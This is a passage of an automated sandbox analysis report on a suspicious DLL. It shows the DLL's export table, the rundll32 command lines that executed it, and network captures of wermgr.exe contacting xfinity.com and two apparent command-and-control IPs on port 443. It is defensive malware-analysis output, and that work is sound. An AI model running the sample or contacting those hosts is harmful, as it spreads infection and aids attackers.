mv_log2_16bit	332	0x10024fd0
mv_log2_i	333	0x10023dd0
mv_log_default_callback	334	0x10025b10
mv_log_format_line	335	0x10026550
mv_log_format_line2	336	0x10026250
mv_log_get_flags	337	0x10026710
mv_log_get_level	338	0x100266e0
mv_log_once	339	0x100265d0
mv_log_set_callback	340	0x10026720
mv_log_set_flags	341	0x10026700
mv_log_set_level	342	0x100266f0
mv_lzo1x_decode	343	0x10026870
mv_malloc	344	0x10028d50
mv_malloc_array	345	0x10028ec0
mv_mallocz	346	0x10029100
mv_mallocz_array	347	0x10028f20
mv_mastering_display_metadata_alloc	348	0x10026f40
mv_mastering_display_metadata_create_side_data	349	0x10026f60
mv_match_list	350	0x100075a0
mv_match_name	351	0x10007100
mv_max_alloc	352	0x10028d40
mv_md5_alloc	353	0x10028790
mv_md5_final	354	0x100289f0
mv_md5_init	355	0x100287b0
mv_md5_size	356	0x100b7208
mv_md5_sum	357	0x10028b00
mv_md5_update	358	0x100287e0
mv_memcpy_backptr	359	0x10029830
mv_memdup	360	0x100294a0
mv_mod_i	361	0x100243c0
mv_mul_i	362	0x10023e60
mv_mul_q	363	0x100358c0
mv_murmur3_alloc	364	0x10029fc0
mv_murmur3_final	365	0x1002a800
mv_murmur3_init	366	0x1002a0d0
mv_murmur3_init_seeded	367	0x10029fe0
mv_murmur3_update	368	0x1002a1b0
mv_nearer_q	369	0x10035ca0
mv_opt_child_class_iterate	370	0x100303a0
mv_opt_child_next	371	0x10030380
mv_opt_copy	372	0x10030430
mv_opt_eval_double	373	0x1002f620
mv_opt_eval_flags	374	0x1002f520
mv_opt_eval_float	375	0x1002f5e0
mv_opt_eval_int	376	0x1002f560
mv_opt_eval_int64	377	0x1002f5a0
mv_opt_eval_q	378	0x1002f660
mv_opt_find	379	0x1002ee70
mv_opt_find2	380	0x1002ec60
mv_opt_flag_is_set	381	0x100302d0
mv_opt_free	382	0x1002ebd0
mv_opt_freep_ranges	383	0x10030760
mv_opt_get	384	0x1002d870
mv_opt_get_channel_layout	385	0x1002e4c0
mv_opt_get_chlayout	386	0x1002e550
mv_opt_get_dict_val	387	0x1002e5e0
mv_opt_get_double	388	0x1002df00
mv_opt_get_image_size	389	0x1002e1a0
mv_opt_get_int	390	0x1002dd90
mv_opt_get_key_value	391	0x1002ea50
mv_opt_get_pixel_fmt	392	0x1002e3c0
mv_opt_get_q	393	0x1002e010
mv_opt_get_sample_fmt	394	0x1002e440
mv_opt_get_video_rate	395	0x1002e230
mv_opt_is_set_to_default	396	0x10030800
mv_opt_is_set_to_default_by_name	397	0x10030d80
mv_opt_next	398	0x1002c760
mv_opt_ptr	399	0x100303c0
mv_opt_query_ranges	400	0x10030700
mv_opt_query_ranges_default	401	0x1002b9f0
mv_opt_serialize	402	0x10030dd0
mv_opt_set	403	0x1002f6a0
mv_opt_set_bin	404	0x1002cfc0
mv_opt_set_channel_layout	405	0x1002d730
mv_opt_set_chlayout	406	0x1002d820
mv_opt_set_defaults	407	0x1002ea30
mv_opt_set_defaults2	408	0x1002e6b0
mv_opt_set_dict	409	0x100302a0
mv_opt_set_dict2	410	0x10030180
mv_opt_set_dict_val	411	0x1002d7b0
mv_opt_set_double	412	0x1002c9d0
mv_opt_set_from_string	413	0x1002ff20
mv_opt_set_image_size	414	0x1002d120
mv_opt_set_int	415	0x1002c7b0
mv_opt_set_pixel_fmt	416	0x1002d510
mv_opt_set_q	417	0x1002ccc0
mv_opt_set_sample_fmt	418	0x1002d620
mv_opt_set_video_rate	419	0x1002d1e0
mv_opt_show2	420	0x1002e640
mv_parse_color	421	0x10031420
mv_parse_cpu_caps	422	0x1000f8b0
mv_parse_ratio	423	0x100310f0
mv_parse_time	424	0x10031c30
mv_parse_video_rate	425	0x100312c0
mv_parse_video_size	426	0x10031200
mv_pix_fmt_count_planes	427	0x10034870
mv_pix_fmt_desc_get	428	0x10034790
mv_pix_fmt_desc_get_id	429	0x10034800
mv_pix_fmt_desc_next	430	0x100347c0
mv_pix_fmt_get_chroma_sub_sample	431	0x10034830
mv_pix_fmt_swap_endianness	432	0x10034920
mv_pixelutils_get_sad_fn	433	0x10035000
mv_q2intfloat	434	0x10036090
mv_rc4_alloc	435	0x100363e0
mv_rc4_crypt	436	0x100364e0
mv_rc4_init	437	0x10036400
mv_read_image_line	438	0x100339c0
mv_read_image_line2	439	0x10033270
mv_realloc	440	0x10028da0
mv_realloc_array	441	0x10029010
mv_realloc_f	442	0x10028de0
mv_reallocp	443	0x10028e40
mv_reallocp_array	444	0x10029050
mv_reduce	445	0x100353b0
mv_rescale	446	0x10027760
mv_rescale_delta	447	0x10027a80
mv_rescale_q	448	0x100277e0
mv_rescale_q_rnd	449	0x100277b0
mv_rescale_rnd	450	0x10027220
mv_ripemd_alloc	451	0x1003c470
mv_ripemd_final	452	0x1003c6e0
mv_ripemd_init	453	0x100a7f8c
mv_ripemd_size	454	0x100bf9a4
mv_ripemd_update	455	0x1003c490
mv_sample_fmt_is_planar	456	0x1003cb70
mv_samples_alloc	457	0x1003ce40
mv_samples_alloc_array_and_samples	458	0x1003d010
mv_samples_copy	459	0x1003d270
mv_samples_fill_arrays	460	0x1003ccd0
mv_samples_get_buffer_size	461	0x1003cb90
mv_samples_set_silence	462	0x1003d450
mv_set_options_string	463	0x1002fd50
mv_sha512_alloc	464	0x1004c260
mv_sha512_final	465	0x1004c4c0
mv_sha512_init	466	0x100a81b0
mv_sha512_size	467	0x100bfaec
mv_sha512_update	468	0x1004c280
mv_sha_alloc	469	0x100411a0
mv_sha_final	470	0x10041410
mv_sha_init	471	0x100a80b4
mv_sha_size	472	0x100bfae4
mv_sha_update	473	0x100411c0
mv_shr_i	474	0x10024280
mv_size_mult	475	0x10029fa0
mv_small_strptime	476	0x10031790
mv_spherical_alloc	477	0x1004d120
mv_spherical_from_name	478	0x1004d280
mv_spherical_projection_name	479	0x1004d260
mv_spherical_tile_bounds	480	0x1004d150
mv_sscanf	481	0x10002f80
mv_stereo3d_alloc	482	0x1004d2d0
mv_stereo3d_create_side_data	483	0x1004d2f0
mv_stereo3d_from_name	484	0x1004d360
mv_stereo3d_type_name	485	0x1004d340
mv_strcasecmp	486	0x10006b30
mv_strdup	487	0x100292e0
mv_strerror	488	0x10013b30
mv_strireplace	489	0x10006bf0
mv_stristart	490	0x10006580
mv_stristr	491	0x100065f0
mv_strlcat	492	0x10006750
mv_strlcatf	493	0x100067f0
mv_strlcpy	494	0x100066e0
mv_strncasecmp	495	0x10006b80
mv_strndup	496	0x100293b0
mv_strnstr	497	0x10006660
mv_strstart	498	0x10006530
mv_strtod	499	0x100150e0
mv_strtok	500	0x10006aa0
mv_sub_i	501	0x10023d00
mv_sub_q	502	0x10035a10
mv_tea_alloc	503	0x1004d460
mv_tea_crypt	504	0x1004d4b0
mv_tea_init	505	0x1004d480
mv_tea_size	506	0x100bfc60
mv_tempfile	507	0x100195a0
mv_thread_message_flush	508	0x1004db40
mv_thread_message_queue_alloc	509	0x1004d700
mv_thread_message_queue_free	510	0x1004d7d0
mv_thread_message_queue_nb_elems	511	0x1004d880
mv_thread_message_queue_recv	512	0x1004d9b0
mv_thread_message_queue_send	513	0x1004d8d0
mv_thread_message_queue_set_err_recv	514	0x1004daf0
mv_thread_message_queue_set_err_send	515	0x1004daa0
mv_thread_message_queue_set_free_func	516	0x1004d7c0
mv_timecode_adjust_ntsc_framenum2	517	0x1004dd30
mv_timecode_check_frame_rate	518	0x1004e8c0
mv_timecode_get_smpte	519	0x1004e080
mv_timecode_get_smpte_from_framenum	520	0x1004ddd0
mv_timecode_init	521	0x1004e930
mv_timecode_init_from_components	522	0x1004ea50
mv_timecode_init_from_string	523	0x1004ec80
mv_timecode_make_mpeg_tc_string	524	0x1004e850
mv_timecode_make_smpte_tc_string	525	0x1004e720
mv_timecode_make_smpte_tc_string2	526	0x1004e520
mv_timecode_make_string	527	0x1004e270
mv_timegm	528	0x10031b50
mv_tree_destroy	529	0x1004f8f0
mv_tree_enumerate	530	0x1004fad0
mv_tree_find	531	0x1004ef60
mv_tree_insert	532	0x1004f020
mv_tree_node_alloc	533	0x1004ef40
mv_tree_node_size	534	0x100bfd80
mv_twofish_alloc	535	0x10050090
mv_twofish_crypt	536	0x100500b0
mv_twofish_init	537	0x100a8637
mv_twofish_size	538	0x100bfda0
mv_tx_init	539	0x100a9843
mv_tx_uninit	540	0x100a8f2b
mv_usleep	541	0x1004dc70
mv_utf8_decode	542	0x10007270
mv_util_ffversion	543	0x100c3fa0
mv_uuid_parse	544	0x1008d110
mv_uuid_parse_range	545	0x1008cff0
mv_uuid_unparse	546	0x1008d160
mv_uuid_urn_parse	547	0x1008d3e0
mv_vbprintf	548	0x10008b70
mv_version_info	549	0x1008d440
mv_video_enc_params_alloc	550	0x1008d480
mv_video_enc_params_create_side_data	551	0x1008d500
mv_vk_frame_alloc	552	0x10021370
mv_vkfmt_from_pixfmt	553	0x10021360
mv_vlog	554	0x10026650
mv_write_image_line	555	0x10034210
mv_write_image_line2	556	0x10033e70
mv_xtea_alloc	557	0x10090760
mv_xtea_crypt	558	0x100907d0
mv_xtea_init	559	0x10090780
mv_xtea_le_crypt	560	0x10090910
mv_xtea_le_init	561	0x100907b0
mvpriv_alloc_fixed_dsp	562	0x10019fa0
mvpriv_cga_font	563	0x100c59e0
mvpriv_dict_set_timestamp	564	0x10012370
mvpriv_float_dsp_alloc	565	0x100a7b20
mvpriv_fopen_utf8	566	0x10019a90
mvpriv_get_gamma_from_trc	567	0x1000f7d0
mvpriv_get_trc_function_from_trc	568	0x1000f800
mvpriv_init_lls	569	0x100a7f58
mvpriv_open	570	0x100195e0
mvpriv_report_missing_feature	571	0x100267e0
mvpriv_request_sample	572	0x10026730
mvpriv_scalarproduct_float_c	573	0x1001a2e0
mvpriv_set_systematic_pal2	574	0x10021bf0
mvpriv_slicethread_create	575	0x1004ce50
mvpriv_slicethread_execute	576	0x1004cb50
mvpriv_slicethread_free	577	0x1004cd20
mvpriv_solve_lls	578	0x10025270
mvpriv_tempfile	579	0x10019970
mvpriv_vga16_font	580	0x100c49e0
mvutil_configuration	581	0x1008d460
mvutil_license	582	0x1008d470
next	583	0x1001db90

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 02:02:21.395545959 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.395616055 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:21.395740032 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.403877020 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.403917074 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:21.762658119 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:21.762820959 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.905689955 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.905747890 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:21.906337023 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:21.907514095 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.909423113 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:21.952311039 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:22.020459890 CEST	443	49717	68.87.41.40	192.168.2.6
May 31, 2023 02:02:22.024616957 CEST	49717	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.191171885 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.191256046 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.191359043 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.192231894 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.192254066 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.542484999 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.542711973 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.543607950 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.543625116 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.546083927 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.546097994 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.656153917 CEST	443	49719	68.87.41.40	192.168.2.6
May 31, 2023 02:02:24.656213999 CEST	49719	443	192.168.2.6	68.87.41.40
May 31, 2023 02:02:24.917645931 CEST	49722	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:24.917711020 CEST	443	49722	124.122.47.148	192.168.2.6
May 31, 2023 02:02:24.917838097 CEST	49722	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:24.918104887 CEST	49722	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:24.918122053 CEST	443	49722	124.122.47.148	192.168.2.6
May 31, 2023 02:02:25.788971901 CEST	443	49722	124.122.47.148	192.168.2.6
May 31, 2023 02:02:25.791188002 CEST	49723	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:25.791268110 CEST	443	49723	124.122.47.148	192.168.2.6
May 31, 2023 02:02:25.791383982 CEST	49723	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:25.791882992 CEST	49723	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:25.791903973 CEST	443	49723	124.122.47.148	192.168.2.6
May 31, 2023 02:02:28.838799000 CEST	443	49723	124.122.47.148	192.168.2.6
May 31, 2023 02:02:28.840245008 CEST	49724	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.840315104 CEST	443	49724	124.122.47.148	192.168.2.6
May 31, 2023 02:02:28.840447903 CEST	49724	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.840545893 CEST	49724	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.840586901 CEST	443	49724	124.122.47.148	192.168.2.6
May 31, 2023 02:02:28.840682030 CEST	49724	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.846647978 CEST	49725	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.846704960 CEST	443	49725	124.122.47.148	192.168.2.6
May 31, 2023 02:02:28.846863031 CEST	49725	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.847457886 CEST	49725	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:28.847490072 CEST	443	49725	124.122.47.148	192.168.2.6
May 31, 2023 02:02:32.038935900 CEST	443	49725	124.122.47.148	192.168.2.6
May 31, 2023 02:02:32.042583942 CEST	49726	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:32.042644024 CEST	443	49726	124.122.47.148	192.168.2.6
May 31, 2023 02:02:32.042743921 CEST	49726	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:32.043035984 CEST	49726	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:32.043060064 CEST	443	49726	124.122.47.148	192.168.2.6
May 31, 2023 02:02:35.102288008 CEST	443	49726	124.122.47.148	192.168.2.6
May 31, 2023 02:02:35.102996111 CEST	49727	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:35.103045940 CEST	443	49727	124.122.47.148	192.168.2.6
May 31, 2023 02:02:35.103143930 CEST	49727	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:35.103199005 CEST	49727	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:35.103272915 CEST	443	49727	124.122.47.148	192.168.2.6
May 31, 2023 02:02:35.103327990 CEST	49727	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:38.136075974 CEST	49728	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:38.136137962 CEST	443	49728	124.122.47.148	192.168.2.6
May 31, 2023 02:02:38.136209965 CEST	49728	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:38.136912107 CEST	49728	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:38.136936903 CEST	443	49728	124.122.47.148	192.168.2.6
May 31, 2023 02:02:41.339708090 CEST	443	49728	124.122.47.148	192.168.2.6
May 31, 2023 02:02:41.340558052 CEST	49729	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:41.340605974 CEST	443	49729	124.122.47.148	192.168.2.6
May 31, 2023 02:02:41.340682030 CEST	49729	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:41.341108084 CEST	49729	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:41.341125965 CEST	443	49729	124.122.47.148	192.168.2.6
May 31, 2023 02:02:44.378849030 CEST	443	49729	124.122.47.148	192.168.2.6
May 31, 2023 02:02:44.379780054 CEST	49730	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.379831076 CEST	443	49730	124.122.47.148	192.168.2.6
May 31, 2023 02:02:44.380007982 CEST	49730	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.380007982 CEST	49730	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.380156994 CEST	443	49730	124.122.47.148	192.168.2.6
May 31, 2023 02:02:44.380238056 CEST	49730	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.384059906 CEST	49731	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.384125948 CEST	443	49731	124.122.47.148	192.168.2.6
May 31, 2023 02:02:44.384212017 CEST	49731	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.384596109 CEST	49731	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:44.384628057 CEST	443	49731	124.122.47.148	192.168.2.6
May 31, 2023 02:02:47.579324007 CEST	443	49731	124.122.47.148	192.168.2.6
May 31, 2023 02:02:47.583457947 CEST	49732	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:47.583539009 CEST	443	49732	124.122.47.148	192.168.2.6
May 31, 2023 02:02:47.593514919 CEST	49732	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:47.593516111 CEST	49732	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:47.593616009 CEST	443	49732	124.122.47.148	192.168.2.6
May 31, 2023 02:02:50.629153013 CEST	443	49732	124.122.47.148	192.168.2.6
May 31, 2023 02:02:50.631695986 CEST	49733	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:50.631772041 CEST	443	49733	124.122.47.148	192.168.2.6
May 31, 2023 02:02:50.632045984 CEST	49733	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:50.632100105 CEST	49733	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:50.632246971 CEST	443	49733	124.122.47.148	192.168.2.6
May 31, 2023 02:02:50.632329941 CEST	49733	443	192.168.2.6	124.122.47.148
May 31, 2023 02:02:55.714771032 CEST	49734	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:55.714826107 CEST	443	49734	151.65.167.77	192.168.2.6
May 31, 2023 02:02:55.714893103 CEST	49734	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:55.715253115 CEST	49734	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:55.715270996 CEST	443	49734	151.65.167.77	192.168.2.6
May 31, 2023 02:02:57.594465971 CEST	443	49734	151.65.167.77	192.168.2.6
May 31, 2023 02:02:57.604345083 CEST	49735	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:57.604429960 CEST	443	49735	151.65.167.77	192.168.2.6
May 31, 2023 02:02:57.604499102 CEST	49735	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:57.604979038 CEST	49735	443	192.168.2.6	151.65.167.77
May 31, 2023 02:02:57.605010033 CEST	443	49735	151.65.167.77	192.168.2.6
May 31, 2023 02:03:00.656333923 CEST	443	49735	151.65.167.77	192.168.2.6
May 31, 2023 02:03:00.657180071 CEST	49736	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.657269955 CEST	443	49736	151.65.167.77	192.168.2.6
May 31, 2023 02:03:00.657371044 CEST	49736	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.657466888 CEST	49736	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.657533884 CEST	443	49736	151.65.167.77	192.168.2.6
May 31, 2023 02:03:00.657582045 CEST	49736	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.660912991 CEST	49737	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.660968065 CEST	443	49737	151.65.167.77	192.168.2.6
May 31, 2023 02:03:00.661050081 CEST	49737	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.661504030 CEST	49737	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:00.661519051 CEST	443	49737	151.65.167.77	192.168.2.6
May 31, 2023 02:03:03.684741974 CEST	443	49737	151.65.167.77	192.168.2.6
May 31, 2023 02:03:03.689027071 CEST	49738	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:03.689091921 CEST	443	49738	151.65.167.77	192.168.2.6
May 31, 2023 02:03:03.689341068 CEST	49738	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:03.689625978 CEST	49738	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:03.689649105 CEST	443	49738	151.65.167.77	192.168.2.6
May 31, 2023 02:03:06.732851028 CEST	443	49738	151.65.167.77	192.168.2.6
May 31, 2023 02:03:06.736605883 CEST	49739	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:06.736681938 CEST	443	49739	151.65.167.77	192.168.2.6
May 31, 2023 02:03:06.736789942 CEST	49739	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:06.736939907 CEST	49739	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:06.737026930 CEST	443	49739	151.65.167.77	192.168.2.6
May 31, 2023 02:03:06.737082005 CEST	49739	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:08.741195917 CEST	49740	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:08.741260052 CEST	443	49740	151.65.167.77	192.168.2.6
May 31, 2023 02:03:08.741342068 CEST	49740	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:08.741875887 CEST	49740	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:08.741898060 CEST	443	49740	151.65.167.77	192.168.2.6
May 31, 2023 02:03:09.784532070 CEST	443	49740	151.65.167.77	192.168.2.6
May 31, 2023 02:03:09.785223961 CEST	49741	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:09.785265923 CEST	443	49741	151.65.167.77	192.168.2.6
May 31, 2023 02:03:09.785331964 CEST	49741	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:09.785780907 CEST	49741	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:09.785799980 CEST	443	49741	151.65.167.77	192.168.2.6
May 31, 2023 02:03:12.788687944 CEST	443	49741	151.65.167.77	192.168.2.6
May 31, 2023 02:03:12.789669037 CEST	49742	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.789711952 CEST	443	49742	151.65.167.77	192.168.2.6
May 31, 2023 02:03:12.789812088 CEST	49742	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.789905071 CEST	49742	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.789944887 CEST	443	49742	151.65.167.77	192.168.2.6
May 31, 2023 02:03:12.790005922 CEST	49742	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.793239117 CEST	49743	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.793325901 CEST	443	49743	151.65.167.77	192.168.2.6
May 31, 2023 02:03:12.793426037 CEST	49743	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.793781996 CEST	49743	443	192.168.2.6	151.65.167.77
May 31, 2023 02:03:12.793807030 CEST	443	49743	151.65.167.77	192.168.2.6
May 31, 2023 02:03:15.828833103 CEST	443	49743	151.65.167.77	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 02:02:21.359383106 CEST	62538	53	192.168.2.6	8.8.8.8
May 31, 2023 02:02:21.381966114 CEST	53	62538	8.8.8.8	192.168.2.6
May 31, 2023 02:02:22.044938087 CEST	54903	53	192.168.2.6	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 31, 2023 02:02:21.359383106 CEST	192.168.2.6	8.8.8.8	0x5488	Standard query (0)	xfinity.com	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:22.044938087 CEST	192.168.2.6	8.8.8.8	0x3b93	Standard query (0)	www.xfinity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 31, 2023 02:02:21.381966114 CEST	8.8.8.8	192.168.2.6	0x5488	No error (0)	xfinity.com		68.87.41.40	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:21.381966114 CEST	8.8.8.8	192.168.2.6	0x5488	No error (0)	xfinity.com		96.114.21.40	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:21.381966114 CEST	8.8.8.8	192.168.2.6	0x5488	No error (0)	xfinity.com		96.114.14.140	A (IP address)	IN (0x0001)	false
May 31, 2023 02:02:22.079413891 CEST	8.8.8.8	192.168.2.6	0x3b93	No error (0)	www.xfinity.com	www.xfinity.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

xfinity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49717	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 00:02:21 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache
2023-05-31 00:02:22 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49719	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 00:02:24 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache Cookie: xpgn=1
2023-05-31 00:02:24 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 7012, Parent PID: 3452

General

Target ID:	0
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\F086.dll"
Imagebase:	0xba0000
File size:	126464 bytes
MD5 hash:	3B4636AE519868037940CA5C4272091B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7036, Parent PID: 7012

General

Target ID:	1
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7100, Parent PID: 7012

General

Target ID:	2
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 684, Parent PID: 7012

General

Target ID:	3
Start time:	01:59:08
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7152, Parent PID: 7100

General

Target ID:	4
Start time:	01:59:09
Start date:	31/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5792, Parent PID: 7152

General

Target ID:	8
